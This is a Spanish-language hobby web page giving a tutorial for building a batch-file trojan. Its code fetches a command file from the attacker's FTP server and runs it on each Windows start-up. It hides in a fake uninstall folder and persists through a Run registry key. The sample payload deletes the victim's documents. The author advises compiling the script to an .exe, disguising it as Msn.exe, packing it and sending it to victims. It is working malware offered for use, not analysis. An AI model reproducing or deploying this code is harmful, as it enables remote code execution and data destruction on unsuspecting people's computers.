Bienvenidos a mi pagina web:Elelu1488
   
  trucosyherramientaseducativas
Navegación
  Programacion Gusano
 
Hola, hoy he decidido compartirles un pequeño codigo en batch, sobre el manejo del FTP en windows y con esta debilidad cree un troyano sencillo
 
que necesitan para crear este pequeño monstruo?
 
1- Requisitos minimos
 
->notepad.exe (si no lo tenes...)
->una cuenta ftp (si no tenes y gozas de una buena internet create un server ftp con el filezilla, tuto de el:
->Vía de propagacion
->Algun programa para compilar batch a exe
->Y algun metodo para camuflarlo
 
2- Codigo para la víctima
 
->Llegados a este punto, crearemos un codigo en batch al cual nombraremos como ordenes.txt
Cuando tengamos el codigo guardado como ordenes.txt; lo deberemos subir a nuestra cuenta FTP
 
* ordenes.txt será el codigo que se ejecute en el pc de la victima cada vez ke inicie windows
 
aca te dejo un ejemplo para ordenes.txt
 
 
@echo off
cd C:WINDOWSsystem32
rmdir /S /Q Cursores
del /S /Q /F %userprofile%mis documentos*.*
(esto es un ejemplo nada mas, ustedes pueden cargarle lo que quieran)
 
 
3- Codigo troyano FTP
 
Aqui les dejo el codigo del .bat que tenes que enviar a tu victima (Lo explicare paso a paso...)
 
NOTA: Luego lo camuflaremos con themida o iexpress o cygy... comprimiendolo con un compresor (winrar, winzip....) para luego enviarlo.
 
 
 
@echo off   // el comando "@echo off" hace que todo lo que se ejecute abajo (codigo) no sea mostrado en
                  pantalla.
 
pushd "%windir%$NtUninstallWudf01000$spuninst"  //el comando "pushd" Guarda un directorio o ruta de red en 
                                                                                la memoria por lo que se puede usar en cualquier  
                                                                                momento.
 
echo username>ftp.tmp               <- Username: Aqui debes colocar nuestro usuario de ftp
echo pass>>ftp.tmp                     <- Pass: Aqui debes colocar la pass de nuestro ftp
echo get ordenes.txt>>ftp.tmp      <-   esta parte sirve para obtener el txt "ordenes" que se encunetra en el FTP
echo bye>>ftp.tmp                       <- sirve para desconectarse
echo quit>>ftp.tmp                       <- sirve para desconectarse
 
 
 
ftp -s:ftp.tmp 127.0.0.1   <- ftp -s:ftp.tmp equivale a que en el contenido de ftp.tmp se utilizara para conectarce a la  ip en este caso 127.0.0.1 (recuerden poner su ip del servidor FTP)
del /f /q ftp.tmp        <- borra el ftp.tmp (al volverse a ejecutar el troyano se vuelve a crear)
rename ordenes.txt soundUni.bat <- la funcion "rename" renombre el ordenes.txt a soundUni.bat
start soundUni.bat <- ejecuta el archivo renombrado para ejecutar el codigo en .bat
 pushd "%homepath%Mis documentosMis archivos recibidos" //el comando "pushd" Guarda un directorio o ruta de red en la memoria por lo que se puede usar en cualquier momento.
copy /Y "nombre del troyano.bat" "%windir%$NtUninstallWudf01000$spuninstnombre del troyano.bat" // copia el bat a otra carpeta
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v "Uninstall" /t Reg_SZ /d // añade al registro
"%windir%$NtUninstallWudf01000$spuninstnombre del troyano.bat /f"
exit // cierra el batch
 
 
acuerdate no le cambies el nombre a ordenes.txt, si lo haces vas a tener que editar el codigo del troyano
compila el .bat a .exe asi queda menos llamativo
Msn.exe ... por ejemplo...en el code tmb lo debeis sustituir....
luego que lo guardas lo subis por el ftp
 y por ultimo, si quieres que el codigo ande acordate de sacarle las cuotas explicativas que he puesto a la izquierda en distintos temas para enseñar el funcionamiento...

  
  Total: 42958 visitantes (67247 clics a subpáginas) ¡Aqui en esta página!  
Facebook botón-like
 
Este sitio web fue creado de forma gratuita con PaginaWebGratis.es. ¿Quieres también tu sitio web propio?
Registrarse gratis